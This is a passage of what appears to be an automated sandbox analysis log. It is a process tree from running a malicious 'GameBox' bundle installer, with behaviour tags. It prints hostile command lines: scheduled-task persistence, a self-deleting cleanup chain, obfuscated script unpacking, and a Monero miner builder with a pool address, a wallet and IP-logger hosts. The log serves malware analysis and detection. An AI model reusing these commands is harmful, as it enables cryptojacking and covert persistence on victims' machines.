                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5312
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmpCFF9_tmp.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\tmpCFF9_tmp.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:6780
                                                                                                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                          "C:\Windows\System32\dllhost.exe"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:6392
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                            7⤵
                                                                                                                                                              PID:7372
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:4960
                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                    findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:2504
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                      Esplorarne.exe.com i
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:5344
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        10⤵
                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:7904
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:7200
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                              12⤵
                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                              PID:8704
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                13⤵
                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                PID:8244
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                  14⤵
                                                                                                                                                                                    PID:2700
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                      15⤵
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      PID:8488
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                        16⤵
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        PID:4612
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                          17⤵
                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                          PID:9056
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                            18⤵
                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                            PID:388
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                              19⤵
                                                                                                                                                                                                PID:9096
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                  PID:8632
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                    21⤵
                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                    PID:8740
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                      22⤵
                                                                                                                                                                                                        PID:8988
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                          23⤵
                                                                                                                                                                                                            PID:2700
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                              24⤵
                                                                                                                                                                                                                PID:7164
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                  25⤵
                                                                                                                                                                                                                  • Drops startup file
                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                  PID:8920
                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                  ping GFBFPSXA -n 30
                                                                                                                                                                                  9⤵
                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                  PID:7620
                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:5412
                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:6900
                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:5344
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\7172690.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\7172690.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:6224
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1100673.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1100673.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                  PID:6240
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\8821742.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\8821742.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:6296
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8097684.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8097684.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:4876
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\3639350.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\3639350.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:6364
                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:5684
                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:5852
                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        PID:5316
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:2648
                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                              taskkill /im runvd.exe /f
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:6452
                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                              PID:8544
                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5284
                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:5960
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5980
                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                    schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:6000
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-VQT2U.tmp\MediaBurner2.tmp
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-VQT2U.tmp\MediaBurner2.tmp" /SL5="$203B2,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5088
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-FR1FB.tmp\ultradumnibour.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-FR1FB.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                        PID:6356
                                                                                                                                                                                        • C:\Program Files\Common Files\EUWSRCPKPN\ultramediaburner.exe
                                                                                                                                                                                          "C:\Program Files\Common Files\EUWSRCPKPN\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5648
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-4CCGM.tmp\ultramediaburner.tmp
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-4CCGM.tmp\ultramediaburner.tmp" /SL5="$30328,281924,62464,C:\Program Files\Common Files\EUWSRCPKPN\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                              PID:6264
                                                                                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:7732
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ff-043c3-5e9-0ca8e-d37f8c6e8e05d\Faegipuwity.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\ff-043c3-5e9-0ca8e-d37f8c6e8e05d\Faegipuwity.exe"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4184
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vknnidoh.xys\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:8576
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\vknnidoh.xys\GcleanerEU.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\vknnidoh.xys\GcleanerEU.exe /eufive
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:8952
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ad4nnxx.1st\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:9164
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4ad4nnxx.1st\installer.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\4ad4nnxx.1st\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                                                          PID:8184
                                                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4ad4nnxx.1st\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4ad4nnxx.1st\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629555817 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:8892
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dqd5ndzp.jd5\ufgaa.exe & exit
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:8428
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lxyo2xfi.xeq\anyname.exe & exit
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:6956
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lxyo2xfi.xeq\anyname.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\lxyo2xfi.xeq\anyname.exe
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:5604
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lxyo2xfi.xeq\anyname.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\lxyo2xfi.xeq\anyname.exe" -q
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:2648
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\urygyb50.ctr\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                  PID:8952
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\urygyb50.ctr\gcleaner.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\urygyb50.ctr\gcleaner.exe /mixfive
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:5848
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r4qasb0b.g4v\autosubplayer.exe /S & exit
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:6188
                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                      PID:2700
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6f-8dedf-148-f3884-7d1de2e7df932\Fyqabililae.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\6f-8dedf-148-f3884-7d1de2e7df932\Fyqabililae.exe"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:4984
                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                      dw20.exe -x -s 2256
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:8508
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-FOOUT.tmp\VPN.tmp
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-FOOUT.tmp\VPN.tmp" /SL5="$20336,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                  PID:4808
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-KLGOG.tmp\Setup.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-KLGOG.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:6808
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-NSP0V.tmp\Setup.tmp
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-NSP0V.tmp\Setup.tmp" /SL5="$2056E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-KLGOG.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                        PID:7800
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:1736
                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                              tapinstall.exe remove tap0901
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                              PID:5088
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:8912
                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                                PID:4408
                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                              PID:5436
                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                              PID:3516
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-1RV38.tmp\Stats.tmp
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-1RV38.tmp\Stats.tmp" /SL5="$202F0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                        PID:4932
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-NCLGS.tmp\builder.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-NCLGS.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:6484
                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                        schtasks.exe /create /tn "customer3" /sc ONLOGON /tr "'C:\PerfLogs\customer3.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:6428
                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                        schtasks.exe /create /tn "md8_8eus" /sc ONLOGON /tr "'C:\Program Files (x86)\Company\NewProduct\Uninstall\md8_8eus.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:6588
                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                        PID:7092
                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding E7E592BAE5AAD2E57692A0FC52F42240 C
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          PID:4812
                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding F15533A876A4A4ABD38895F64F3A58A2 C
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          PID:8224
                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 30034CB05EC3CAFD4801F636AB72D9D0
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          PID:8752
                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 58FA4CD3A895444DDE606441ED88F1BD C
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          PID:7896
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                          PID:7016
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                            PID:8468
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                              PID:8560
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1f0,0x1f4,0x1f8,0x1cc,0x1fc,0x7ffed2b1dec0,0x7ffed2b1ded0,0x7ffed2b1dee0
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:504
